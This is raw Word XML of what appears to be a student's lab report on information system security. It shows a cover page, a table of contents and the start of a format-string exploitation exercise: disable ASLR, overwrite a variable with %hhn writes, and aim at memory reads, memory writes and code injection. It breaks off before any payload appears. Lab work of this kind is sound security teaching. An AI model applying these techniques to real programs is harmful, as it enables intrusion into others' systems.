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BAA572">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2009662B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0254F8"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4846955" cy="88582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1A36">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E5AACF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9FD67D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114F6D48">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>信息系统安全实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517FD182">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="069745BC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13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2845"/>
      </w:tblGrid>
      <w:tr w14:paraId="6C6C0E95">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="16889850">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="right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姓    名：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="1305B55E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="109A451D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5442FEB0">
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="right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学    院：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="7D86736A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>网络空间安全学院</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6C014699">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="079F82DA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="right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专    业：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="4FC3D5F6">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>网络空间安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="71850C28">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="41A69FF9">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="right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班    级：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="5AE5A385">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="442DEB95">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4106BFE4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="right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学    号：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="1F28D803">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5FF76CD5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3D3A654E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="right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2845" w:type="dxa"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="7BE89CE3">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="12" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="12"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6127A692">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="6553" w:tblpY="5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</w:tblGrid>
      <w:tr w14:paraId="142627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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="4EE3A9B3">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="3326DA4C">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7FC10E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exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="3679E430">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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  <w:noWrap w:val="0"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="4B850571">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44AE1BB1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2522EE57">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154542D9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0F5B59">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53854B27">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0806DFEC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:sectPr>
          <w:footerReference r:id="rId3" w:type="default"/>
          <w:footerReference r:id="rId4" w:type="even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default"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AEF488">
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目  录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F354D7">
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
          <w:tab w:val="clear" w:pos="829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_Toc1393435329 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>软件安全</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1393435329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 w14:paraId="0A6AF7BA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_Toc407611092 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc407611092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143D7B7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_Toc2024904743 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验内容、步骤及结果</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2024904743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B61F93E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_Toc1956153719 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验中的问题、心得和建议</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1956153719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F201204"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_Toc963132795 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验二 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统安全</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc963132795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16D32136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_Toc508567693 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc508567693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774C91F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_Toc1937188480 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验内容、步骤及结果</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1937188480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E686C5B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_Toc1902270896 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验中的问题、心得和建议</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1902270896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595B1A91"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_Toc308129763 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三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Web安全</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc308129763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6DA61F2A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_Toc1223526918 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1223526918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14FD249A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_Toc1253096822 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验内容、步骤及结果</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1253096822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2FA6A7DE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_Toc1150502548 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验中的问题、心得和建议</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1150502548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01B9AAE8">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:spacing w:line="360" w:lineRule="auto"/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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDDB43B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc1393435329"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>软件安全</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2B57E279">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc407611092"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="42B95318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在缓冲区溢出漏洞利用基础上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理解如何进行格式化字符串漏洞利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7E766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C 语言中的 printf() 函数用于根据格式打印出字符串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使用由 printf() 函数的 % 字符标记的占位符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在打印期间填充数据。格式化字符串的使用不仅限于 printf() 函数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其他函数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例如 sprintf()、 fprintf() 和 scanf()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也使用格式字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6697E636">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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某些程序允许用户以格式字符串提供全部或部分内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>本实验的目的是利用格式化字符串漏洞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实施以下攻击</w:t>
      </w:r>
      <w:r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</w:rPr>
        <w:t>(1)程序崩溃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(2)读取程序内存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(3)修改程序内存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(4)恶意代码注入和执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CE957">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc2024904743"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验内容、步骤及结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="648709B7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针对prog1，完成以下任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458CE249">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>任务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需关闭ASLR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604C607F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>改变程序的内存数据</w:t>
      </w:r>
      <w:r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</w:rPr>
        <w:t>将变量var的值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从0x11223344变成0x66887799</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6CE67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/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改变程序的内存数据</w:t>
      </w:r>
      <w:r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</w:rPr>
        <w:t>将变量var的值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从0x11223344变成0xdeadbeef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1832E037">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/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>后半部分数据小于前半部分数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D6394B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0"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>为避免print大量字符,可以将数据分成4个部分分别写入(使用%hhn)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364EF8EB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使用编译选项-m32 -g -no-pie编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>prog1.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
